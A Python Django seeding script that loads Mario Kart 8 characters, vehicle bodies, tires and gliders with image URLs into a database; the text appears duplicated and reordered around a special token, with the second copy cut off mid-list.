'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533'
,
'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541'
,
'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559'
,
'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549'
,
'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724'
,
'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817'
,
'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338'
,
'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627'
,
'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626'
,
'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629'
,
'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630'
,
'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539'
,
'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810'
]
glider_names = ['Super Glider', 'Cloud Glider', 'Wario Wing', 'Waddle Wing',
'Peach Parasol', 'Parachute', 'Parafoil', 'Flower Glider',
'Bowser Kite', 'Plane Glider', 'MKTV Parafoil', 'Gold Glider',
'Hylian Kite', 'Paraglider', 'Paper Glider']
glider_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815'
,
'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838'
,
'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853'
,
'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940'
,
'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830'
,
'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909'
,
'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930'
,
'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947'
,
'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956'
,
'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731'
,
'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313'
]
x = 0
y = 0
for char in char_names:
index = x - y + 1
name = char_names[x]
if 'Yoshi (' in name or 'Shyguy (' in name or '(G)' in name:
y += 1
index = None
new_char = Character(name=char_names[x], image_url=char_urls[x], index=
index)
new_char.save()
x += 1
x = 0
for tire in tire_names:
index = x + 1
new_tire = Tire(name=tire_names[x], image_url=tire_urls[x], index=index)
new_tire.save()
x += 1
x = 0
for car in car_names:
index = x + 1
new_car = Vehicle(name=car_names[x], image_url=car_urls[x], index=index)
new_car.save()
x += 1
x = 0
for glider in glider_names:
index = x + 1
new_glider = Glider(name=glider_names[x], image_url=glider_urls[x],
index=index)
new_glider.save()
x += 1
<|reserved_special_token_1|>
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mkrandom.settings')
import django
django.setup()
from main.models import Character, Vehicle, Tire, Glider
char_names = ['Mario', 'Luigi', 'Peach', 'Daisy', 'Rosalina',
'Mario Tanooki', 'Peach cat', 'Yoshi', 'Yoshi (LBlue)', 'Yoshi (Black)',
'Yoshi (Rose)', 'Yoshi (Yellow)', 'Yoshi (White)', 'Yoshi (Blue)',
'Yoshi (Rose)', 'Yoshi (Orange)', 'Toad', 'Koopa', 'Shyguy',
'Shyguy (LB)', 'Shyguy (Black)', 'Shyguy (Rose)', 'Shyguy (Yellow)',
'Shyguy (White)', 'Shyguy (Blue)', 'Shyguy (Rose)', 'Shyguy (Orange)',
'Lakitu', 'Toadette', 'Boo', 'Baby Mario', 'Baby Luigi', 'Baby Peach',
'Baby Daisy', 'Baby Rosalina', 'Metal Mario', 'Golden Mario',
'Golden Peach', 'Wario', 'Waluigi', 'Donkey Kong', 'Bowser', 'Skelerex',
'Bowser Jr', 'Dry Bowser', 'Lemmy', 'Larry', 'Wendy', 'Ludwig', 'Iggy',
'Roy', 'Morton', 'Inkling (G)', 'Inkling (B)', 'Link (SSBU)',
'Link (BOTW)', 'Villager (B)', 'Villager(G)', 'Mary']
char_urls = [
'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr'
, 'https://freepngimg.com/thumb/categories/462.png',
'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr'
,
'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png'
,
'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png'
,
'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809'
, 'https://www.123-stickers.com/5731-6069-large/Array.jpg',
'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr'
,
'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr'
,
'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr'
,
'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png'
,
'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png'
,
'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr'
,
'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo'
,
'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png'
,
'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM'
,
'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ'
,
'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708'
,
'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649'
,
'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910'
,
'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014'
,
'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222'
,
'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png'
,
'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png'
,
'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117'
, 'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',
'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323'
,
'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8'
, 'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',
'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141'
,
'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr'
,
'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525'
,
'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr'
,
'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png'
,
'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png'
,
'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129'
,
'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png'
,
'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr'
,
'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112'
,
'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405'
,
'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png'
,
'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png'
,
'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543'
,
'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en'
,
'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png'
,
'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr'
]
car_names = ['Standard Kart', 'Pipe Frame', 'Mach 8', 'Steel Driver',
'Cat Cruiser', 'Circuit Special', 'Tri-Speeder', 'Badwagon', 'Prancer',
'Biddybuggy', 'Landship', 'Sneeker', 'Sports Coupe', 'Gold Standard',
'GLA', 'W 25 Silver Arrow', '300 SL Roadster', 'Blue Falcon',
'Tanooki Kart', 'B Dasher', 'Streetle', 'P-Wing', 'Koopa Clown',
'Standard Bike', 'Comet', 'Sport Bike', 'The Duke', 'Flame Rider',
'Varmint', 'Mr. Scooty', 'Jet Bike', 'Yoshi Bike', 'Master Cycle',
'Master Cycle Zero', 'City Tripper', 'Standard ATV', 'Wild Wiggler',
'Teddy Buggy', 'Bone Rattler', 'Splat Buggy', 'Inkstriker']
car_urls = [
'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932'
,
'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956'
,
'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237'
,
'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350'
,
'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333'
,
'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656'
,
'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625'
,
'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333'
,
'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'
,
'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'
,
'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545'
,
'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836'
,
'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005'
,
'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107'
,
'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052'
,
'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857'
,
'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819'
,
'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951'
,
'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925'
,
'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928'
,
'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256'
,
'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734'
,
'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936'
,
'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601'
,
'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111'
,
'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108'
,
'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814'
,
'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507'
]
tire_names = ['Standard', 'Monster', 'Roller', 'Slim', 'Slick', 'Metal',
'Button', 'Off-Road', 'Sponge', 'Wood', 'Cushion', 'Blue Standard',
'Hot Monster', 'Azure Roller', 'Crimson Slim', 'Cyber Slick',
'Retro Off-Road', 'Gold Tires', 'GLA Tires', 'Triforce Tires',
'Ancient Tyres', 'Leaf Tires']
tire_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545'
,
'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541'
,
'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536'
,
'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542'
,
'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533'
,
'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541'
,
'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559'
,
'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549'
,
'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724'
,
'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817'
,
'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338'
,
'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627'
,
'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626'
,
'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629'
,
'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630'
,
'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539'
,
'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810'
]
glider_names = ['Super Glider', 'Cloud Glider', 'Wario Wing', 'Waddle Wing',
'Peach Parasol', 'Parachute', 'Parafoil', 'Flower Glider',
'Bowser Kite', 'Plane Glider', 'MKTV Parafoil', 'Gold Glider',
'Hylian Kite', 'Paraglider', 'Paper Glider']
glider_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815'
,
'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838'
,
'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853'
,
